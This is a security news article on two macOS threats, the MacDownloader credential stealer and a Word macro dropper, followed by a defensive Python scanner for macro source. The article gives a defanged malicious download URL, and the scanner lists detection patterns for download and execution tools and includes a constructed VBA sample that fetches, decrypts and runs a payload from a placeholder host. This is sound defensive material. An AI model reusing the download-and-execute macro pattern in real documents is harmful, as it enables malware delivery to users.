In the past week, two relatively crude threats to Mac users have surfaced. Both target Apple’s desktop operating system, now called macOS.
The first piece of malware, analyzed by researchers Claudio Guarnieri and Collin Anderson and dubbed MacDownloader, was used as part of an attack that targeted the U.S. defense and aerospace industries. The attackers created a fraudulent website that appeared to come from United Technologies, a U.S. aerospace firm.
MacDownloader presents itself to users as an antivirus or adware-removal tool, or as an Adobe Flash installer. Its actual goal is to steal user credentials from the macOS Keychain.
Researchers believe that, while the malware is currently a rather straightforward exfiltration tool, it may be in the early stages of becoming a platform from which to launch different types of attacks.
“Based on observations on infrastructure, and the state of the code, we believe these incidents represent the first attempts to deploy the agent, and features such as persistence do not appear to work. Instead, MacDownloader is a simple exfiltration agent, with broader ambitions,” the team wrote.
The bogus website doesn’t just target Mac users. If Windows users visit the site, they are targeted with malware designed for their operating system.
This isn’t the only Mac malware revealed this week. Ars Technica security editor Dan Goodin has a good write-up on a Microsoft Word macro attack — that’s right, a good old-fashioned document macro like those that have targeted Windows users for roughly two decades.
From Goodin’s story, Mac malware is still crude, but it’s slowly catching up to its Windows rivals:
The attack was found in a Word file titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.” When Mac users open the document in a Word application configured to allow macros and ignore a warning, an embedded macro automatically:
- Checks to make sure the LittleSnitch security firewall isn’t running
- Downloads an encrypted payload from hxxps://www.securitychecking.org:443/index.asp
- Decrypts the payload using a hard-coded key and
- Executes the payload
The code contained in the macro is written in the Python programming language. It was taken almost verbatim from EmPyre, an open-source exploit framework for Macs.
Goodin adds that because the system serving the malware was no longer active at the time of discovery, it’s not possible to know exactly what the malicious software did.
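The four-step behaviour Goodin describes (a firewall check, a download, decryption with an embedded key, execution) is exactly the kind of pattern a defender can triage for once the macro source has been pulled out of a document. The following scanner is an added example written for this article; it is not code from Ars Technica, from the analysed document, or from EmPyre. It assumes the macro text has already been extracted (for instance with a macro-extraction tool; how that is done is outside this example) and it works on a constructed sample whose helper names (ProcessRunning, Download, AesDecrypt) are fictional stand-ins, not real VBA. It reports which behaviour categories appear, pulls out any URLs in defanged form, and gives a coarse verdict.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicator categories mirroring the four behaviours described in the article.
# Each regex is matched case-insensitively against extracted macro source.
INDICATORS: dict[str, list[str]] = {
    "security_tool_check": [r"Little\s*Snitch", r"\bpgrep\b", r"\bps\s+-ax\b"],
    "network_download": [
        r"\bh[xt]{2}ps?://[^\s\"'<>)]+",          # http(s) or defanged hxxp(s) URL
        r"\b(?:urllib2?|requests|XMLHTTP|WinHttp|curl|wget)\b",
    ],
    "decryption": [
        r"\bAes", r"Decrypt", r"\bRC4\b", r"b64decode", r"Base64",
        r"""\bkey\s*=\s*["'][^"']{8,}["']""",       # literal key embedded in the macro
    ],
    "execution": [r"\bShell\b", r"\bos\.system\b", r"\bsubprocess\b",
                  r"\bexec\b", r"\bpopen\b", r"\bpython\b\s+-c"],
}


def find_indicators(source: str) -> dict[str, list[str]]:
    """Return {category: [unique matched strings]} for categories that fire."""
    hits: dict[str, list[str]] = {}
    for category, patterns in INDICATORS.items():
        found: list[str] = []
        for pattern in patterns:
            for match in re.finditer(pattern, source, re.IGNORECASE):
                if match.group(0) not in found:
                    found.append(match.group(0))
        if found:
            hits[category] = found
    return hits


def defang(url: str) -> str:
    """Neutralise the scheme so the URL cannot be clicked from a report."""
    return re.sub(r"^http", "hxxp", url, count=1, flags=re.IGNORECASE)


def extract_urls(source: str) -> list[str]:
    """Collect every URL in the macro, defanged, in order of appearance."""
    urls: list[str] = []
    for match in re.finditer(INDICATORS["network_download"][0], source, re.IGNORECASE):
        url = defang(match.group(0))
        if url not in urls:
            urls.append(url)
    return urls


@dataclass
class MacroReport:
    hits: dict[str, list[str]]
    urls: list[str]

    @property
    def categories_hit(self) -> int:
        return len(self.hits)

    @property
    def verdict(self) -> str:
        # Three or more of the four behaviours together is the full pattern
        # from the article; a single hit only warrants a human look.
        if self.categories_hit >= 3:
            return "suspicious"
        return "review" if self.categories_hit else "clean"


def assess(source: str) -> MacroReport:
    return MacroReport(hits=find_indicators(source), urls=extract_urls(source))


# Constructed sample: helper names are fictional, the URL is a placeholder.
SAMPLE_MALICIOUS = '''
Private Sub Document_Open()
    If Not ProcessRunning("LittleSnitch") Then
        payload = Download("hxxps://example.invalid:443/index.asp")
        key = "0123456789abcdef"
        plain = AesDecrypt(payload, key)
        Shell plain
    End If
End Sub
'''

# Constructed benign sample: edits a header field and nothing else.
SAMPLE_BENIGN = '''
Private Sub Document_Open()
    ActiveDocument.Sections(1).Headers(1).Range.Text = "Draft"
End Sub
'''

if __name__ == "__main__":
    for name, text in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        report = assess(text)
        print(name, report.verdict, report.categories_hit, report.hits, report.urls)
```

The categories are deliberately coarse: a single keyword such as Shell appears in plenty of legitimate automation, so the verdict only escalates when several of the behaviours co-occur, which is what distinguishes the downloader pattern above from ordinary document macros.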
That’s not very reassuring, and both of these incidents point to the possibility that malware targeting macOS is gaining pace. One thing is clear, however — malware authors will never tire of trying to trick end users into clicking on something dangerous.
So Web surfer beware: Don’t click anything unless reasonably certain it’s safe to do so.